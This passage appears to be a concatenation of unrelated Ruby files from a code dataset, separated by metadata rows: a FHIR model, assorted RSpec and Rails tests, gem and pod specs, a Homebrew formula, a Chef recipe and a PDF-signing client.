'id' => {'type'=>'string', 'path'=>'Code.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Code.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Code.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'code' => {'type'=>'CodeableConcept', 'path'=>'Code.code', 'min'=>0, 'max'=>1},
'status' => {'type'=>'CodeableConcept', 'path'=>'Code.status', 'min'=>0, 'max'=>1},
'statusDate' => {'type'=>'dateTime', 'path'=>'Code.statusDate', 'min'=>0, 'max'=>1},
'comment' => {'type'=>'string', 'path'=>'Code.comment', 'min'=>0, 'max'=>1},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'Code.source', 'min'=>0, 'max'=>Float::INFINITY}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :code # 0-1 CodeableConcept
attr_accessor :status # 0-1 CodeableConcept
attr_accessor :statusDate # 0-1 dateTime
attr_accessor :comment # 0-1 string
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
end
class Name < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Name.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Name.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Name.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'name' => {'type'=>'string', 'path'=>'Name.name', 'min'=>1, 'max'=>1},
'type' => {'type'=>'CodeableConcept', 'path'=>'Name.type', 'min'=>0, 'max'=>1},
'status' => {'type'=>'CodeableConcept', 'path'=>'Name.status', 'min'=>0, 'max'=>1},
'preferred' => {'type'=>'boolean', 'path'=>'Name.preferred', 'min'=>0, 'max'=>1},
'language' => {'type'=>'CodeableConcept', 'path'=>'Name.language', 'min'=>0, 'max'=>Float::INFINITY},
'domain' => {'type'=>'CodeableConcept', 'path'=>'Name.domain', 'min'=>0, 'max'=>Float::INFINITY},
'jurisdiction' => {'type'=>'CodeableConcept', 'path'=>'Name.jurisdiction', 'min'=>0, 'max'=>Float::INFINITY},
'synonym' => {'type'=>'SubstanceSpecification::Name', 'path'=>'Name.synonym', 'min'=>0, 'max'=>Float::INFINITY},
'translation' => {'type'=>'SubstanceSpecification::Name', 'path'=>'Name.translation', 'min'=>0, 'max'=>Float::INFINITY},
'official' => {'type'=>'SubstanceSpecification::Name::Official', 'path'=>'Name.official', 'min'=>0, 'max'=>Float::INFINITY},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'Name.source', 'min'=>0, 'max'=>Float::INFINITY}
}
class Official < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Official.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Official.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Official.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'authority' => {'type'=>'CodeableConcept', 'path'=>'Official.authority', 'min'=>0, 'max'=>1},
'status' => {'type'=>'CodeableConcept', 'path'=>'Official.status', 'min'=>0, 'max'=>1},
'date' => {'type'=>'dateTime', 'path'=>'Official.date', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :authority # 0-1 CodeableConcept
attr_accessor :status # 0-1 CodeableConcept
attr_accessor :date # 0-1 dateTime
end
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :name # 1-1 string
attr_accessor :type # 0-1 CodeableConcept
attr_accessor :status # 0-1 CodeableConcept
attr_accessor :preferred # 0-1 boolean
attr_accessor :language # 0-* [ CodeableConcept ]
attr_accessor :domain # 0-* [ CodeableConcept ]
attr_accessor :jurisdiction # 0-* [ CodeableConcept ]
attr_accessor :synonym # 0-* [ SubstanceSpecification::Name ]
attr_accessor :translation # 0-* [ SubstanceSpecification::Name ]
attr_accessor :official # 0-* [ SubstanceSpecification::Name::Official ]
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
end
class Relationship < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
MULTIPLE_TYPES = {
'substance' => ['Reference', 'CodeableConcept'],
'amount' => ['Quantity', 'Range', 'Ratio', 'string']
}
METADATA = {
'id' => {'type'=>'string', 'path'=>'Relationship.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Relationship.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Relationship.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'substanceReference' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceSpecification'], 'type'=>'Reference', 'path'=>'Relationship.substance[x]', 'min'=>0, 'max'=>1},
'substanceCodeableConcept' => {'type'=>'CodeableConcept', 'path'=>'Relationship.substance[x]', 'min'=>0, 'max'=>1},
'relationship' => {'type'=>'CodeableConcept', 'path'=>'Relationship.relationship', 'min'=>0, 'max'=>1},
'isDefining' => {'type'=>'boolean', 'path'=>'Relationship.isDefining', 'min'=>0, 'max'=>1},
'amountQuantity' => {'type'=>'Quantity', 'path'=>'Relationship.amount[x]', 'min'=>0, 'max'=>1},
'amountRange' => {'type'=>'Range', 'path'=>'Relationship.amount[x]', 'min'=>0, 'max'=>1},
'amountRatio' => {'type'=>'Ratio', 'path'=>'Relationship.amount[x]', 'min'=>0, 'max'=>1},
'amountString' => {'type'=>'string', 'path'=>'Relationship.amount[x]', 'min'=>0, 'max'=>1},
'amountRatioLowLimit' => {'type'=>'Ratio', 'path'=>'Relationship.amountRatioLowLimit', 'min'=>0, 'max'=>1},
'amountType' => {'type'=>'CodeableConcept', 'path'=>'Relationship.amountType', 'min'=>0, 'max'=>1},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'Relationship.source', 'min'=>0, 'max'=>Float::INFINITY}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :substanceReference # 0-1 Reference(SubstanceSpecification)
attr_accessor :substanceCodeableConcept # 0-1 CodeableConcept
attr_accessor :relationship # 0-1 CodeableConcept
attr_accessor :isDefining # 0-1 boolean
attr_accessor :amountQuantity # 0-1 Quantity
attr_accessor :amountRange # 0-1 Range
attr_accessor :amountRatio # 0-1 Ratio
attr_accessor :amountString # 0-1 string
attr_accessor :amountRatioLowLimit # 0-1 Ratio
attr_accessor :amountType # 0-1 CodeableConcept
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
end
attr_accessor :id # 0-1 id
attr_accessor :meta # 0-1 Meta
attr_accessor :implicitRules # 0-1 uri
attr_accessor :language # 0-1 code
attr_accessor :text # 0-1 Narrative
attr_accessor :contained # 0-* [ Resource ]
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :identifier # 0-1 Identifier
attr_accessor :type # 0-1 CodeableConcept
attr_accessor :status # 0-1 CodeableConcept
attr_accessor :domain # 0-1 CodeableConcept
attr_accessor :description # 0-1 string
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
attr_accessor :comment # 0-1 string
attr_accessor :moiety # 0-* [ SubstanceSpecification::Moiety ]
attr_accessor :property # 0-* [ SubstanceSpecification::Property ]
attr_accessor :referenceInformation # 0-1 Reference(SubstanceReferenceInformation)
attr_accessor :structure # 0-1 SubstanceSpecification::Structure
attr_accessor :code # 0-* [ SubstanceSpecification::Code ]
attr_accessor :name # 0-* [ SubstanceSpecification::Name ]
attr_accessor :molecularWeight # 0-* [ SubstanceSpecification::Structure::Isotope::MolecularWeight ]
attr_accessor :relationship # 0-* [ SubstanceSpecification::Relationship ]
attr_accessor :nucleicAcid # 0-1 Reference(SubstanceNucleicAcid)
attr_accessor :polymer # 0-1 Reference(SubstancePolymer)
attr_accessor :protein # 0-1 Reference(SubstanceProtein)
attr_accessor :sourceMaterial # 0-1 Reference(SubstanceSourceMaterial)
def resourceType
'SubstanceSpecification'
end
end
end | 67.829268 | 651 | 0.585001 |
3942c6a5a75b1773afc55cb0d15e102e954492bf | 388 | require 'spec_helper'
describe Telecine::Registry do
it_should_behave_like "a Registry"
it 'should take hash default arg' do
subject = described_class.new("foo")
subject.get(:foo).should == "foo"
end
it 'should not respond to hash methods' do
[:fetch, :store, :delete, :[], :[]=].each do |method|
subject.respond_to?(method).should be_false
end
end
end
| 22.823529 | 57 | 0.675258 |
79a370a31c77b7fca20f14e492d1ea052defcc30 | 1,632 | #
# Be sure to run `pod lib lint PQSearchControl.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'PQSearchControl'
s.version = '0.1.0'
s.summary = 'A short description of PQSearchControl.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/zoudike/PQSearchControl.git'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'zoudike' => '[email protected]' }
s.source = { :git => 'https://github.com/zoudike/PQSearchControl.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'PQSearchControl/Classes/**/*'
# s.resource_bundles = {
# 'PQSearchControl' => ['PQSearchControl/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 37.953488 | 107 | 0.645221 |
396d5e71da0c0130a54dcdf2b5882815ad67283a | 524 | require_relative "../task"
require_relative "metrics"
class UpdateMetricsTask < Task
def run
puts "* Updating #{font_class_path}"
source = updated_font_class
open_file(font_class_path, "w") do |file|
file.write source
end
end
def updated_font_class
font_class.sub(/ASCENT = \d+/, "ASCENT = #{Metrics.ascent}").sub(/DESCENT = -\d+/, "DESCENT = #{Metrics.descent}")
end
def font_class
open_file(font_class_path)
end
def font_class_path
"lib/font_awesome/font.rb"
end
end
| 20.153846 | 118 | 0.683206 |
f786f82f8599019daf1185cd72af658feb1c45d3 | 1,989 | require_relative '../parser.rb'
RSpec.describe "Parser" do
context "deals with query strings" do
before do
request = instance_double("Request", :uri => "GET /home?first=Burt&last=Malkiel")
@parser = Parser.new(request)
end
it "returns the method of an URI" do
expect(@parser.http_method).to eq("GET")
end
it "returns the route of an URI" do
expect(@parser.resource).to eq("/home")
end
it "returns query parameters of an URI" do
expect(@parser.parameters["first"]).to eq("Burt")
expect(@parser.parameters["last"]).to eq("Malkiel")
end
end
context "deals with no query strings" do
before do
request = instance_double("Request", :uri => "GET /home")
@parser = Parser.new(request)
end
it "returns query parameters of an URI" do
expect(@parser.parameters).to eq({})
end
end
context "handles invalid query strings" do
before do
request = instance_double("Request", :uri => "GET /home?first")
@parser = Parser.new(request)
end
it "returns default query parameters" do
expect(@parser.parameters).to eq({})
end
end
context "handles POST requests" do
before do
request = instance_double("Request", :uri => "POST /home", :headers => { "content" => "user=cat&password=dog"})
@parser = Parser.new(request)
end
it "returns the method of a POST request successfully" do
expect(@parser.http_method).to eq("POST")
end
it "returns the post body of the request" do
expect(@parser.parameters).to eq({ "user" => "cat", "password" => "dog" })
end
end
context "Handle URI encoding" do
before do
request = instance_double("Request", :uri => "GET /home?first=foobar&last=%261234%26")
@parser = Parser.new(request)
end
it "can successfully decode URI encoded strings" do
expect(@parser.parameters).to eq({ "first" => "foobar", "last" => "&1234&"})
end
end
end | 26.171053 | 117 | 0.63097 |
333abc9d7a21a76c837431f489803761eea15e0c | 949 | require "test_helper"
class UserMailerTest < ActionMailer::TestCase
test "account_activation" do
user = users(:michael)
user.activation_token = User.new_token
mail = UserMailer.account_activation(user)
assert_equal "Account activation", mail.subject
assert_equal [user.email], mail.to
assert_equal ["[email protected]"], mail.from
assert_match user.name, mail.body.encoded
assert_match user.activation_token, mail.body.encoded
assert_match CGI.escape(user.email), mail.body.encoded
end
test "password_reset" do
user = users(:michael)
user.reset_token = User.new_token
mail = UserMailer.password_reset(user)
assert_equal "Password reset", mail.subject
assert_equal [user.email], mail.to
assert_equal ["[email protected]"], mail.from
assert_match user.reset_token, mail.body.encoded
assert_match CGI.escape(user.email), mail.body.encoded
end
end
| 33.892857 | 59 | 0.726027 |
217c985bdde5f6db0d40900d4a433ecf18fa2460 | 1,120 | require "./lib/paginate/version"
Gem::Specification.new do |s|
s.name = "paginate"
s.version = Paginate::Version::STRING
s.platform = Gem::Platform::RUBY
s.authors = ["Nando Vieira"]
s.email = ["[email protected]"]
s.homepage = "http://rubygems.org/gems/paginate"
s.summary = "Paginate collections using SIZE+1 to determine if there is a next page. Includes ActiveRecord and ActionView support."
s.description = s.summary
s.required_ruby_version = ">= 2.0.0"
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
s.require_paths = ["lib"]
s.add_development_dependency "nokogiri"
s.add_development_dependency "sqlite3-ruby"
s.add_development_dependency "rails"
s.add_development_dependency "minitest", "~> 5.1"
s.add_development_dependency "minitest-utils"
s.add_development_dependency "pry-meta"
s.add_development_dependency "mocha"
s.add_development_dependency "codeclimate-test-reporter"
end
| 40 | 137 | 0.692857 |
26588d3cfd558175da0f501d8378e22a75307298 | 166 | class CreateAmenityLists < ActiveRecord::Migration
def change
create_table :amenity_lists do |t|
t.boolean :wifi
t.boolean :couch
end
end
end
| 18.444444 | 50 | 0.692771 |
1c8ee65d3a9c4b3d1431c069795992de2cfb6987 | 1,463 | require 'spec_helper'
class PlatformApiDummyController < Spree::Api::V2::Platform::ResourceController
private
def model_class
Spree::Address
end
def scope
Spree::Address
end
end
describe Spree::Api::V2::Platform::ResourceController, type: :controller do
let(:dummy_controller) { PlatformApiDummyController.new }
describe '#resource_serializer' do
it { expect(dummy_controller.send(:resource_serializer)).to be Spree::Api::V2::Platform::AddressSerializer }
end
describe '#collection_serializer' do
it { expect(dummy_controller.send(:collection_serializer)).to be Spree::Api::V2::Platform::AddressSerializer }
end
describe '#collection' do
before do
create(:address)
dummy_controller.params = {}
end
let(:collection) { dummy_controller.send(:collection) }
it { expect(collection).to be_instance_of(Spree::Address.const_get(:ActiveRecord_Relation)) }
it { expect(collection.first).to be_instance_of(Spree::Address) }
it { expect(collection.count).to eq(1) }
end
describe '#permitted_resource_params' do
let(:valid_attributes) do
{
address: {
firstname: 'John',
lastname: 'Snow'
}
}
end
before do
dummy_controller.params = valid_attributes
end
it { expect(dummy_controller.send(:permitted_resource_params)).to eq(ActionController::Parameters.new(valid_attributes).require(:address).permit!) }
end
end
| 26.125 | 152 | 0.704033 |
e888ba1f2ed9df45985d465a839c235379730743 | 640 | class AmmoniteRepl < Formula
desc "Ammonite is a cleanroom re-implementation of the Scala REPL"
homepage "https://lihaoyi.github.io/Ammonite/#Ammonite-REPL"
url "https://github.com/lihaoyi/Ammonite/releases/download/1.8.2/2.12-1.8.2"
sha256 "378d7a9fa1a8f44f8e27769259a465423cf540658ba42365213a3c00e4a8acc0"
bottle :unneeded
depends_on :java => "1.8+"
def install
libexec.install Dir["*"].shift => "amm"
chmod 0555, libexec/"amm"
bin.install_symlink libexec/"amm"
end
test do
output = shell_output("#{bin}/amm -c 'print(\"hello world!\")'")
assert_equal "hello world!", output.lines.last
end
end
| 29.090909 | 78 | 0.714063 |
08e8eceff7b3e46951b39e1849443ab6430d707e | 382 | tarball = 'go1.4.2.linux-arm~multiarch-armv7-1.tar.gz'
tarball_path = ::File.join(Chef::Config[:file_cache_path], tarball)
remote_file tarball_path do
source "http://dave.cheney.net/paste/#{tarball}"
action :create_if_missing
notifies :run, 'execute[decompress_tarball]'
end
execute 'decompress_tarball' do
command "tar -zxf #{tarball_path} -C /opt"
action :nothing
end
| 27.285714 | 67 | 0.748691 |
bb276c46f1d9995cd54ff73a244b216bc11c1c7e | 2,585 | require 'fast_spec_helper'
require 'active_support/core_ext/object/blank'
require 'epi_cas/ldap_info'
describe EpiCas::LdapInfo do
subject { EpiCas::LdapInfo.new('username', double(find_by_username: double(uid: "abc", givenname: "test", sn: "user", mail: "[email protected]", dn: "dn", ou: "EPG"))) }
describe '#get_ldap_info' do
describe 'Getting info from LDAP' do
it "gets the info from ldap server when a user can be found" do
allow(subject).to receive(:ldap_finder){ double(lookup: { 'uid' => ['abc'], 'givenname' => ['test'], 'sn' => ['user'], 'mail' => ['[email protected]'], 'dn' => ['dn'], 'ou' => ['EPG'] }) }
expect(subject.send(:get_ldap_info, double(read_only: false))).to eq ({
uid: "abc",
givenname: "test",
sn: "user",
mail: "[email protected]",
dn: "dn",
ou: "EPG"
})
end
it "returns empty hash if user cannot be found" do
allow(subject).to receive(:ldap_finder){ double(lookup: { }) }
expect(subject.send(:get_ldap_info, double(read_only: false))).to eq ({})
end
end
describe 'LDAP server down' do
before do
class FakeLdapError < StandardError; end
ldap_finder = double
allow(ldap_finder).to receive(:lookup).and_raise(FakeLdapError)
allow(subject).to receive(:ldap_finder){ ldap_finder }
end
it 'uses the existing data in database if LDAP server fails to work' do
expect(subject).to receive(:get_ldap_info_from_database)
subject.send(:get_ldap_info, double(read_only: false))
end
it "returns empty hash if user does not already exist" do
expect(subject).to receive(:get_ldap_info_from_database){ {} }
expect(subject.send(:get_ldap_info, double(read_only: false))).to eq ({})
end
end
describe 'When the system is read only' do
it 'uses the existing data in database' do
expect(subject).to receive(:get_ldap_info_from_database)
subject.send(:get_ldap_info, double(read_only: true))
end
end
end
describe '#get_ldap_info_from_database' do
it 'finds the user in database and returns the LDAP information' do
user_class = double(find_by_username: double(uid: 'abc', givenname: 'test', sn: 'user', mail: '[email protected]', dn: 'dn', ou: 'EPG'))
expect(subject.send(:get_ldap_info_from_database, user_class)).to eq ({
uid: "abc",
givenname: "test",
sn: "user",
mail: "[email protected]",
dn: "dn",
ou: "EPG"
})
end
end
end
| 36.928571 | 192 | 0.622824 |
f8095a74ca15aea773e0ae261bb2b8d87af2daca | 3,684 | require 'base64'
module RestPki
class PadesSignatureStarter < SignatureStarter
attr_accessor :visual_representation
def initialize(restpki_client)
super(restpki_client)
@pdf_content_base64 = nil
@visual_representation = nil
end
#region set_pdf_tosign
def set_pdf_tosign_from_path(pdf_path)
file = File.open(pdf_path, 'rb')
@pdf_content_base64 = Base64.encode64(file.read)
file.close
@pdf_content_base64
end
def set_pdf_tosign_from_raw(content_raw)
@pdf_content_base64 = Base64.encode64(content_raw)
end
def set_pdf_tosign_from_base64(content_base64)
@pdf_content_base64 = content_base64
end
def set_pdf_content_tosign(content_raw)
set_pdf_tosign_from_raw(content_raw)
end
def set_pdf_file_tosign(pdf_path)
set_pdf_tosign_from_path(pdf_path)
end
#endregion
def start_with_webpki
if @pdf_content_base64.to_s.blank?
raise 'The PDF to sign was not set'
end
if @signature_policy_id.to_s.blank?
raise 'The signature policy was not set'
end
request = {
securityContextId: @security_context_id,
pdfToSign: @pdf_content_base64,
signaturePolicyId: @signature_policy_id,
callbackArgument: @callback_argument,
visualRepresentation: @visual_representation,
ignoreRevocationStatusUnknown: @ignore_revocation_status_unknown
}
unless @signer_certificate_base64.to_s.blank?
request['certificate'] = Base64.encode64(@signer_certificate_base64)
end
response = @restpki_client.post('Api/PadesSignatures', request, 'pades_model')
unless response['certificate'].nil?
@certificate = response['certificate']
end
@done = true
response['token']
end
def start
if @pdf_content_base64.to_s.blank?
raise 'The PDF to sign was not set'
end
if @signature_policy_id.to_s.blank?
raise 'The signature policy was not set'
end
if @signer_certificate_base64.to_s.blank?
raise 'The signer certificate was not set'
end
request = {
securityContextId: @security_context_id,
pdfToSign: @pdf_content_base64,
signaturePolicyId: @signature_policy_id,
callbackArgument: @callback_argument,
visualRepresentation: @visual_representation,
ignoreRevocationStatusUnknown: @ignore_revocation_status_unknown
}
unless @signer_certificate_base64.to_s.blank?
request['certificate'] = Base64.encode64(@signer_certificate_base64)
end
response = @restpki_client.post('Api/PadesSignatures', request, 'pades_model')
unless response['certificate'].nil?
@certificate = response['certificate']
end
@done = true
{
:token => response['token'],
:to_sign_data => response['toSignData'],
:to_sign_hash => response['toSignHash'],
:digest_algorithm_oid => response['digestAlgorithmOid'],
:signature_algorithm => get_signature_algorithm(response['digestAlgorithmOid'])
}
end
end
end | 33.490909 | 95 | 0.586048 |
265296984d845c300baf86a02139d719c6bf65be | 368 | #
# = config/initializers/annotation_security.rb
#
# Sets up files under <tt>config/security</tt> which hold
# the security configuration.
#
# Add your own files here if they should also be loaded.
#
AnnotationSecurity.load_relations('relations')
AnnotationSecurity.load_rights('rights')
# AnnotationSecurity.load_rights('rights', 'rb) # loads rights from a ruby file | 30.666667 | 79 | 0.777174 |
abb81602de1857d37b1fd65de66fdadea4c01609 | 1,018 | require "spec_helper"
describe "Set store values in xml feed", type: :feature, js: true do
stub_authorization!
let(:store) { Spree::Store.default }
context "If no preferances are set" do
it "it renders the default store details correctly" do
visit "/products.rss"
expect(page.body).to have_text("<title>Spree Test Store</title>")
expect(page.body).to have_text("<link>www.example.com</link>")
expect(page.body).to have_text("<language>#{I18n.locale}</language>")
end
end
context "When custom properties are set" do
before do
store.update(url: "www.therubberfactory.com", name: "The Rubber Factory", default_locale: "en-GB")
end
it "the feed displays custom title, link and language" do
visit "/products.rss"
expect(page.body).to have_text("<title>The Rubber Factory</title>")
expect(page.body).to have_text("<link>www.therubberfactory.com</link>")
expect(page.body).to have_text("<language>en-gb</language>")
end
end
end
| 31.8125 | 104 | 0.681729 |
0831344d6814798a9b55d6673adf037b9c3de7a5 | 9,695 | require 'spec_helper'
require 'pry'
describe 'device_manager' do
let(:pre_condition) do
[
'class cisco_ios {}',
'class f5 {}',
]
end
context 'declared on a device' do
let(:title) { 'cisco.example.com' }
let(:params) do
{
ensure: :present,
type: 'cisco_ios',
}
end
let(:facts) do
{
os: { family: 'cisco_ios' },
}
end
it { is_expected.to raise_error(%r{declared on a device}) }
end
context 'declared on Linux, running Puppet 5.0, with values for all device.conf parameters' do
let(:title) { 'f5.example.com' }
let(:params) do
{
ensure: :present,
type: 'f5',
url: 'https://admin:[email protected]/',
debug: true,
}
end
let(:facts) do
{
aio_agent_version: '5.0.0',
puppetversion: '5.0.0',
puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
puppet_settings_confdir: '/etc/puppetlabs',
os: { family: 'redhat' },
}
end
it { is_expected.to contain_device_manager(title) }
it { is_expected.to contain_class('device_manager::conf') }
it { is_expected.to contain_class('device_manager::fact') }
it { is_expected.to contain_class('F5') }
end
context 'declared on Windows, running Puppet 5.0, with values for all device.conf parameters' do
let(:title) { 'f5.example.com' }
let(:params) do
{
ensure: :present,
type: 'f5',
url: 'https://admin:[email protected]/',
debug: true,
}
end
let(:facts) do
{
aio_agent_version: '5.0.0',
puppetversion: '5.0.0',
puppet_settings_deviceconfig: 'C:/ProgramData/PuppetLabs/puppet/etc/device.conf',
puppet_settings_confdir: 'C:/ProgramData/PuppetLabs/puppet',
os: { family: 'windows' },
env_windows_installdir: 'C:\\Program Files\\Puppet Labs\\Puppet',
}
end
it { is_expected.to contain_device_manager(title) }
it { is_expected.to contain_class('device_manager::conf') }
it { is_expected.to contain_class('device_manager::fact') }
it { is_expected.to contain_class('F5') }
end
context 'declared on Linux, running Puppet 4.10, with run_interval' do
let(:title) { 'f5.example.com' }
let(:params) do
{
ensure: :present,
type: 'f5',
url: 'https://admin:[email protected]/',
run_interval: 30,
}
end
let(:facts) do
{
aio_agent_version: '4.10.0',
puppetversion: '4.10.0',
puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
puppet_settings_confdir: '/etc/puppetlabs',
os: { family: 'redhat' },
}
end
it { is_expected.to contain_device_manager(title) }
it { is_expected.to contain_class('device_manager::conf') }
it { is_expected.to contain_class('device_manager::fact') }
it { is_expected.to contain_class('F5') }
it { is_expected.to contain_device_manager__run__via_cron__device(title) }
it {
is_expected.to contain_cron('run puppet device').with(
'command' => '/opt/puppetlabs/puppet/bin/puppet device --user=root --waitforcert=0 --verbose --logdest syslog',
)
}
end
context 'declared on Linux, running Puppet 5.0, with run_interval' do
let(:title) { 'f5.example.com' }
let(:params) do
{
ensure: :present,
type: 'f5',
url: 'https://admin:[email protected]/',
run_interval: 30,
}
end
let(:facts) do
{
aio_agent_version: '5.0.0',
puppetversion: '5.0.0',
puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
puppet_settings_confdir: '/etc/puppetlabs',
os: { family: 'redhat' },
}
end
it { is_expected.to contain_device_manager(title) }
it { is_expected.to contain_class('device_manager::conf') }
it { is_expected.to contain_class('device_manager::fact') }
it { is_expected.to contain_class('F5') }
it { is_expected.to contain_device_manager__run__via_cron__device(title) }
it {
is_expected.to contain_cron("run puppet device target #{title}").with(
'command' => "/opt/puppetlabs/puppet/bin/puppet device --user=root --waitforcert=0 --verbose --logdest syslog --target=#{title}",
'hour' => '*',
)
}
end
context 'declared on Windows, running Puppet 5.0, with run_interval' do
let(:title) { 'f5.example.com' }
let(:task_name) { 'f5_example_com' }
let(:params) do
{
ensure: :present,
type: 'f5',
url: 'https://admin:[email protected]/',
run_interval: 30,
}
end
let(:facts) do
{
aio_agent_version: '5.0.0',
puppetversion: '5.0.0',
puppet_settings_deviceconfig: 'C:/ProgramData/PuppetLabs/puppet/etc/device.conf',
puppet_settings_confdir: 'C:/ProgramData/PuppetLabs/puppet',
os: { family: 'windows' },
env_windows_installdir: 'C:\\Program Files\\Puppet Labs\\Puppet',
}
end
it { is_expected.to contain_device_manager(title) }
it { is_expected.to contain_class('device_manager::conf') }
it { is_expected.to contain_class('device_manager::fact') }
it { is_expected.to contain_class('F5') }
it { is_expected.to contain_device_manager__run__via_scheduled_task__device(title) }
it {
is_expected.to contain_scheduled_task("run puppet device target #{task_name}").with(
'command' => 'C:\\Program Files\\Puppet Labs\\Puppet\\bin\\puppet',
'arguments' => "device --user=root --waitforcert=0 --verbose --logdest eventlog --target=#{title}",
)
}
end
# The puppet command is quoted in this Exec to support spaces in the path on Windows.
context 'declared on Linux, running Puppet 5.0, with run_via_exec' do
let(:title) { 'f5.example.com' }
let(:params) do
{
ensure: 'present',
type: 'f5',
url: 'https://admin:[email protected]/',
run_interval: 0,
run_via_exec: true,
}
end
let(:facts) do
{
aio_agent_version: '5.0.0',
puppetversion: '5.0.0',
puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
puppet_settings_confdir: '/etc/puppetlabs',
os: { family: 'redhat' },
}
end
it { is_expected.to contain_device_manager(title) }
it { is_expected.to contain_class('device_manager::conf') }
it { is_expected.to contain_class('device_manager::fact') }
it { is_expected.to contain_class('F5') }
it { is_expected.to contain_device_manager__run__via_exec__device(title) }
it {
is_expected.to contain_exec("run puppet device target #{title}").with(
'command' => %("/opt/puppetlabs/puppet/bin/puppet" device --user=root --waitforcert=0 --verbose --logdest syslog --target=#{title}),
)
}
end
context 'declared on Linux, running Puppet 5.0, with run_interval and run_via_exec parameters' do
let(:title) { 'f5.example.com' }
let(:params) do
{
ensure: :present,
type: 'f5',
url: 'https://admin:[email protected]/',
run_interval: 30,
run_via_exec: true,
}
end
let(:facts) do
{
aio_agent_version: '5.0.0',
puppetversion: '5.0.0',
puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
puppet_settings_confdir: '/etc/puppetlabs',
os: { family: 'redhat' },
}
end
it { is_expected.to raise_error(%r{are mutually-exclusive}) }
end
context 'declared on Linux, running Puppet 5.5, with credentials' do
let(:title) { 'cisco.example.com' }
let(:params) do
{
ensure: :present,
type: 'cisco_ios',
credentials: { 'address' => '10.0.0.245', 'port' => 22, 'username' => 'admin', 'password' => 'cisco', 'enable_password' => 'cisco' },
}
end
let(:facts) do
{
aio_agent_version: '5.5.0',
puppetversion: '5.5.0',
puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
puppet_settings_confdir: '/etc/puppetlabs',
os: { family: 'redhat' },
}
end
let(:device_credentials_file) { "/etc/puppetlabs/puppet/devices/#{title}.conf" }
it { is_expected.to contain_device_manager(title) }
it { is_expected.to contain_class('device_manager::conf') }
it { is_expected.to contain_class('device_manager::fact') }
it { is_expected.to contain_class('Cisco_ios') }
# TODO: Identify the rspec syntax for matching an attribute value containing newlines.
# Or, Identify the rspec syntax for substring matching an attribute value.
# it {
# is_expected.to contain_concat_fragment("device_manager_conf [#{title}]").with('content').including("url file://#{device_credentials_file}")
# }
end
context 'declared on Linux, running Puppet 5.5, with credentials and url parameters' do
let(:title) { 'cisco.example.com' }
let(:params) do
{
ensure: :present,
type: 'cisco_ios',
credentials: { 'address' => '10.0.0.245', 'port' => 22, 'username' => 'admin', 'password' => 'cisco', 'enable_password' => 'cisco' },
